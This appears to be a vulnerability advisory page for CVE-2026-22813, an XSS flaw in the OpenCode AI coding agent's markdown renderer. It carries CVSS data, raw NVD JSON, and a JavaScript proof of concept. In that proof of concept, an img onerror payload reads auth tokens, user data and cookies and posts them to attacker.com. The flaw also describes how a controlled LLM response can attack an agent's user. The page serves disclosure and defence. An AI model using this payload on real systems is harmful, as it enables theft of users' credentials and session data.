Security Vulnerability Report
CVE-2026-22813 CVSS 6.1 MEDIUM

CVE-2026-22813

Published: 2026-01-12 23:15:54
Last Modified: 2026-01-21 15:15:36

Description

OpenCode is an open source AI coding agent. The markdown renderer used for LLM responses inserts arbitrary HTML into the DOM; there is no sanitization with DOMPurify, nor a CSP on the web interface, to prevent JavaScript execution via HTML injection. Anyone who controls the LLM response for a chat session therefore gets JavaScript execution on the http://localhost:4096 origin. This vulnerability is fixed in 1.1.10.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:anoma:opencode:*:*:*:*:*:-:*:* - VULNERABLE
OpenCode < 1.1.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-22813 PoC - XSS via Markdown Renderer in OpenCode
// This PoC demonstrates how to inject arbitrary JavaScript through LLM responses

// Malicious payload that can be injected as an LLM response
const maliciousPayload = `
<img src=x onerror="
  // Steal sensitive data from localStorage
  const tokens = localStorage.getItem('auth_tokens');
  const userData = localStorage.getItem('user_info');

  // Exfiltrate data to attacker-controlled server
  fetch('https://attacker.com/exfil', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({
      tokens: tokens,
      userData: userData,
      cookies: document.cookie,
      timestamp: new Date().toISOString()
    })
  });

  // Alternative payload: Session hijacking
  // InjectBeEForMeterpreterPayload();
">
`;

// Simulated LLM response injection
function simulateLLMResponseInjection(response) {
  // In vulnerable version, this directly inserts HTML without sanitization
  const chatContainer = document.getElementById('chat-messages');
  chatContainer.innerHTML += `<div class="message assistant">${response}</div>`;
}

// Execute the PoC
simulateLLMResponseInjection(maliciousPayload);

// Clean payload example (what should be done)
const safePayload = `
<script>
  // This should be sanitized before rendering
  console.log('Safe rendering required');
</script>
`;

References

https://github.com/anomalyco/opencode/security/advisories/GHSA-c83v-7274-4vgp (Vendor Advisory, Exploit)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22813", "sourceIdentifier": "[email protected]", "published": "2026-01-12T23:15:53.523", "lastModified": "2026-01-21T15:15:35.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenCode is an open source AI coding agent. The markdown renderer used for LLM responses will insert arbitrary HTML into the DOM. There is no sanitization with DOMPurify or even a CSP on the web interface to prevent JavaScript execution via HTML injection. This means controlling the LLM response for a chat session gets JavaScript execution on the http://localhost:4096 origin. This vulnerability is fixed in 1.1.10."}, {"lang": "es", "value": "OpenCode es un agente de codificación de IA de código abierto. El renderizador de markdown utilizado para las respuestas del LLM insertará HTML arbitrario en el DOM. No hay sanitización con DOMPurify ni siquiera una CSP en la interfaz web para evitar la ejecución de JavaScript a través de la inyección de HTML. Esto significa que controlar la respuesta del LLM para una sesión de chat obtiene la ejecución de JavaScript en el origen http://localhost:4096. Esta vulnerabilidad está corregida en 1.1.10."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anoma:opencode:*:*:*:*:*:-:*:*", "versionEndExcluding": "1.1.10", "matchCriteriaId": "521FFCAB-C7CA-4867-9674-B8AF2637091E"}]}]}], "references": [{"url": "https://github.com/anomalyco/opencode/security/advisories/GHSA-c83v-7274-4vgp", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}, {"url": "https://github.com/anomalyco/opencode/security/advisories/GHSA-c83v-7274-4vgp", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory", "Exploit"]}]}}